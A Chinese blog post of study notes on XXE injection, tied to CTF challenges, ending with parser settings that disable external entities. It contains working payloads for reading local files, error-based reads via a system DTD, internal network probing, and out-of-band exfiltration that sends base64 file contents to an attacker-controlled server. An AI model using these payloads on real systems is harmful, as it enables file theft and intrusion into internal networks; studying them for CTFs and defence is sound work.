XXE漏洞学习

最新推荐文章于 2024-06-13 23:06:06 发布
最新推荐文章于 2024-06-13 23:06:06 发布
阅读量398 收藏 1
点赞数 2
分类专栏: 学习笔记 文章标签: web安全 xml 安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62078839/article/details/124363147
版权

漏洞原理

XXE漏洞就是XML外部实体注入,就是当xml引用外部实体并解析的时候会产生的漏洞,xml解析器去获取其中的外部资源并存储到内部实体中,攻击者可引用外部实体对目标进行文件读取、命令执行、DDOS、内网探测等。

利用方式

命令执行

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE a[
	<!ENTITY test SYSTEM "命令">
]>
<c>&test</c>

读取任意文件

有回显

不出网

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>

如若有回显的话,我们可以直接读取文件

出网

<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY  % xxe SYSTEM "http://ip地址/xxe.dtd" >
%xxe;]>
<foo>&a;</foo>

我们在我们的服务器上创建如下文件xxe.dtd



<!ENTITY evil SYSTEM “file:///文件路径” >

以一题为例

BUUCTF[NCTF2019]Fake XML cookbook

利用系统自带的dtd来实现任意文件读取

详情可以访问此连接https://mohemiv.com/tags/xxe/

  <?xml version="1.0"?>
    <!DOCTYPE message [
        <!ELEMENT message ANY>
        <!ENTITY % remote SYSTEM "/usr/share/yelp/dtd/docbookx.dtd">
        <!ENTITY % para1 SYSTEM "file:///flag">
        <!ENTITY % ISOamso '
            <!ENTITY &#x25; para2 "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///&#x25;para1;&#x27;>">
            &#x25;para2;
        '>
        %remote;
    ]>
    <message></message>

 以BUU[GoogleCTF2019 Quals]Bnv为例

无回显

外部实体可以通过请求内部文件url获得内部文件内容,这样的话我们可以写两个外部参数实体,第一个用file协议请求本地文件并将内容保存在参数实体中,第二个用http或者ftp协议请求自己的服务器并带上文件内容。

<?xml version="1.0"?>
<!DOCTYPE message [
    <!ENTITY % remote SYSTEM "http://IP地址/xml.dtd">  
    <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///flag">
    %remote;
    %send;
]>
<message></message>

xml.dtd

<!ENTITY % start "<!ENTITY &#x25; send SYSTEM 'http://myip:10001/?%file;'>">
%start;

内部的%号要进行实体编码成&#x25

内网探测

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "http://192.168.1.1:80/">
]>
<x>&f;</x>

以一题目为例

BUU [NCTF2019]True XML cookbook

防御xxe漏洞

使用开发语言提供的禁用外部实体的方法

 
PHP:
libxml_disable_entity_loader(true);
 
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
 
Python:
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

过滤用户提交的XML数据

H3018-R
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【1day】宏景OA SmsAcceptGSTXServlet接口 XXE漏洞学习——可读取任意文件
记录并分享学习安全的知识点..
09-16 597
宏景OA是一款基于云计算和SaaS模式的企业级办公自动化软件,它为企业提供了全面的办公自动化解决方案,包括协同办公、流程管理、文档管理、知识管理、人力资源管理、客户关系管理等多个模块。它可以帮助企业提高工作效率、降低成本、提高管理水平和企业形象。宏景OA SmsAcceptGSTXServlet接口存在xxe漏洞,攻击者可以利用它来获取敏感信息、控制应用程序、破坏内部网络安全等,从而对企业造成严重的损失。
xxe漏洞详解
scu_hacker博客
12-17 3743
本文详细描述了xxe漏洞的原理、利用方式、防御方法
XXE漏洞与CTF题目
m0_62725813的博客
12-09 660
典型的XXE攻击是由XML声明:<?DTD部分(通过特殊的命令去其他文件读取信息)SYSTEMXML部分组成危害:XXE 可以通过dtd去读取,访问其他文件或者网站,类似于ssrf">]> DTD部分</scan> XML部分scan标签设置一个test的实体,这个实体是通过system命令访问1.txt构造payload>//XML声明">]>
CTF XXE漏洞攻击
夏日 の blog
05-07 3799
文章目录Fake XML CookbookTrue XML CookbookISCC 未知的风险-1参考 Fake XML Cookbook F12 查看源码: function doLogin(){ var username = $("#username").val(); var password = $("#password").val(); if(username == "" || ...
XXE漏洞解析(带代码演示+靶场实战)
最新发布
wudideaqing的博客
06-13 1747
XXEXML External Entity)是一种安全漏洞,发生在应用程序解析XML输入时。攻击者可以通过该漏洞插入恶意的外部实体,从而获取系统文件或执行其他恶意操作。核心是我们输入的代码,会被当作xml代码执行XML(可扩展标记语言,Extensible Markup Language)是一种用于表示结构化信息的标记语言。它由W3C(万维网联盟)开发,用于存储和传输数据。XML的主要特点包括:1、自我描述:XML文档包含数据以及数据的结构信息,使用标签来标记数据。
xmlxxe漏洞
m0_48907714的博客
04-25 4218
XXE漏洞 XML概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 XML与HTML的主要差异 XML被设计为传输和存储数据,其焦
XXE漏洞(ctfshow-xxe)
unexpectedthing的博客
10-29 1019
文章目录XEE漏洞的原理ctfshow-xxeweb373web374,375,376web377web378 XEE漏洞的原理 XML外部实体注入 ctfshow-xxe web373 代码 <?php error_reporting(0); libxml_disable_entity_loader(false); //file_get_contents("php://input"),我们需要post我们的payload $xmlfile = file_get_contents('php://inp
XXE漏洞
acepanhuan的博客
02-18 540
XXE漏洞
xxe漏洞学习
L1ni01
11-06 188
xxe漏洞学习 一.XML基础知识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 DTD元素 DTD属性 以下是 属性类型的选项: 我们XXE 利用的是 它的实体属性 DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。DTD 可以在 XML 文档内声明,也可以外部引用。 内部声明DTD <!DOCTYPE 根元素 [元素声明]&gt
XXE漏洞学习之CTF
qq_46085232的博客
04-09 617
两道有关XXE的CTF题目盲猜过程总结Vulnhub练习题过程总结 盲猜 题目地址:http://web.jarvisoj.com:9882/ 过程 访问题目地址 提交数据,进行抓包 看到数据提交这里,以为是基于json格式的sql注入,结果不是的,看页面源代码也看不出啥的,只怪自己的太菜。后来,才知道这里靠xxe漏洞,盲猜服务端能接受xml格式数据,修改Content-tpye值,并提交xml格式的playload。 修改数据包,进行提交,获取flag(这里我通过读取etc/passwd知道有hom
初识XML------XXE漏洞
weixin_44770698的博客
06-09 605
初始XXE漏洞
XXE - XML外部实体注入攻击
javaEE_zero的博客
01-04 614
XXE漏洞XML外部实体注入攻击
XXE读取文件 Geek10th
weixin_44377940的博客
11-14 999
点开网站: 抓包,修改属性: 返回了这么一串: 由于是$name==md5(),由弱类型比较和md5想到md5碰撞,
漏洞总结——XXEXML外部实体注入)
Spontaneous_0的博客
09-08 495
XXE漏洞全称为 XML External Entity Injection,即XML外部实体注入XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载, 导致用户可以控制外部的加载文件,造成XXE漏洞
记录遇到的有趣的CTF题---simple_api(xxe漏洞)
tothemoon的博客
11-05 2097
这是我参加的一场校内的CTF比赛。大佬们的write up还在整理当中,我就先用我之前做题时的截图做一个简单的复现。write up出来后再查漏补缺。 1.打开网站后除了这个啥也没有,查看源代码也没有提示。 学过python的同学应该会发现这一段字典,但在这里的意思应该是响应错误,但仔细看了源码后也没与发现注入点,这时想到题目名为simple_api。 抓包添加xxe代码后就能跑出flag了。 x...
Web安全-XXE漏洞
道阻且长,行则将至。
11-25 2640
XML简介 1、定义 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。 2、文档结构 XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。 <!--XML声明--> <?xml version="1.0"?> <!--文档类型定义--> <!DOCTYPE no...
CTF之xxe
qq_37410729的博客
10-26 1799
xxe漏洞即我们可以进行外部实体注入,当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。 两个writeup 第一题: bp抓包 然后就可以进行xml注入了 这是两种xxe,我们先试第二种(因为源代码并没有标注flag在什么文件中) 然后进内网 然而并进不去,那就只能找存活主机了。 直接暴力寻找 第二题: 按照上题的思路走 但是并没有找到flag。。。。 最后只能去文件里找了,但是题目没有标明具体flag在那个文件,只能试一下/flag文
DTD(文档类型定义)介绍
qq_40321119的博客
10-18 2461
DTD简介 DTD中文意思是:文档类型定义,主要用来定义合法的文档结构(包括XML和HTML);可以声明在文档中,也可以作为外部的引用。 内部DTD声明 <?xml version="1.0"?> <!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> ...
XXE漏洞深度解析与实战演练
本文档详细介绍了XXEXML External Entity)漏洞的概念、危害、检测方法、利用...通过学习,你可以了解如何识别和利用XXE漏洞,以及如何防止这类漏洞的发生。同时,参与VulnHub的靶场练习将帮助你进一步巩固所学知识。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值